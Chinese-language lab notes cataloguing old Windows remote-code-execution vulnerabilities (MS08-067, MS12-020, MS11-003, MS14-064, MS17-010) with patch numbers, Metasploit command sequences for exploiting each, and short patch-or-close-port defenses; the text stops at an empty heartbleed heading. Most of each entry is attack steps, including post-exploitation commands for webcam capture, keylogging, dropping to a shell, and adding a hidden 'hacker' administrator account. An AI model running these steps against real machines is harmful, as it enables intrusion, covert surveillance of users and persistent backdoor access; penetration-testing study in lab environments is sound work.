常見主機漏洞
1.MS08_067
-
利用端口:445
類型:緩沖區溢出漏洞、遠程任意指令執行漏洞RCE
范圍:win2000、xp、server 2003、vista、server 2008、7 Beta
補丁:KB958644
描述:如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞運行任意代碼。 此漏洞可能用於進行蠕蟲攻擊。
-
操作步驟:
環境:kali xp英文版
利用工具 metasploit
命令:
msfconsole search ms08_067 use 0 show options set rhosts xp'ip show target 34(7) show payloads set payload 44 run/exploit
-
實驗補充:
webcam_stream 打開攝像頭返回視頻流 webcam_snap 打開攝像頭返回照片 ps 展示當前運行的進程信息 migrate [pig 號] 切換進程 keyscan_start 開始鍵盤監聽 keyscan_dump 打印監聽到的內容 keyscan_stop 結束鍵盤監聽 shell 進入到windows命令行下 whoami 查看當前賬戶是誰 dir 查看文件 net user hacker 123456/add net localgroup administrators hacker /add rdesktop xp'ip 打開遠程桌面登陸xp
-
防御
方法1:安裝補丁
方法2:防火牆關閉445端口
2.MS12_020
-
利用端口:3389(RDP協議)
類型:緩沖區溢出漏洞、遠程任意指令執行漏洞RCE、拒絕服務漏洞
范圍:xp、server 2003、vista、server 2008
補丁:KB2621440
描述:如果攻擊者向受影響的系統發送一系列特制 RDP 數據包,則這些漏洞中較嚴重的漏洞可能允許遠程執行代碼,或造成系統拒絕服務。
-
操作步驟
實驗環境 kali、win2003
利用工具:metasploit
命令:
msfconsole search ms12_020 use 1 show options set rhosts win2003'ip /24 run/exploit search ms12_020 use 0 show options set rhosts win2003'ip run/exploit
-
防御
方法1:安裝補丁
方法2:防火牆關閉3389端口
3.MS11_003
-
利用協議:HTTP協議
漏洞類型:緩沖區溢出漏洞、遠程任意指令執行漏洞(RCE)
影響范圍: IE6、IE7、IE8
微軟安全公告:KB2482017
漏洞描述:
這些漏洞可在用戶使用 Internet Explorer 查看特制 Web 頁面或者用戶打開一個加載特制庫文件的合法 HTML 文件時允許遠程執行代碼。 -
操作步驟
環境:kali win7
工具:metasploit
-
命令:
- msfconsole search ms11_003 use 0 show options set srvhost kali'ip show options set uripath a exploit/run sessions sessions 1 shell whoami -
防御
方法1:安裝補丁
方法2 : 使用其他瀏覽器的最新版本
4.MS14_064
-
利用協議:HTTP協議
漏洞類型:緩沖區溢出漏洞、遠程任意指令執行漏洞(RCE)
影響范圍: windows2003、2008、2012、vista、win7、win8
微軟安全公告:KB3010788
漏洞描述:
OLE即對象連接與嵌入技術。OLE不僅是桌面應用程序集成,而且還定義和實現了一種允許應用程序作為軟件“對象”彼此進行“連接”的機制。Microsoft Windows處理特制OLE對象文件的方式中存在遠程代碼執行漏洞,成功利用后可允許攻擊者以當前用戶權限執行任意代碼。 -
操作步驟
環境kali win7
工具 metasploit
命令:
msfconsole search ms14_064 use 0 show options show payloads set payload 50 show options set AllowPowershellPrompt true show options show targets set target 1 show options run sessions sessions 1 shell whoami
-
防御
方法1:安裝補丁
方法2 : 不使用IE系列瀏覽器
5.MS17_010
-
利用協議:SMB
漏洞類型:緩沖區溢出漏洞、遠程任意指令執行漏洞(RCE)
影響范圍: windows2003、2008、2012、2016、vista、win7、win8、win10(1511/1607版)
微軟安全公告:KB4012598、KB4012212、KB4012215
漏洞描述:
如果攻擊者向 Windows SMBv1 服務器發送特殊設計的消息,那么其中最嚴重的漏洞可能允許遠程執行代碼。 -
操作步驟
環境kali win7
工具 metasploit
命令:
msfconsole search ms17_010 use 1 show options set rhosts win7' ip run search use 2 set rhosts win'ip run net user hacker 123 /add net localgroup administrators hacker /add ctrl+c rdesktop [win7的ip]
-
防御:
安裝補丁
6.heartbleed漏洞
-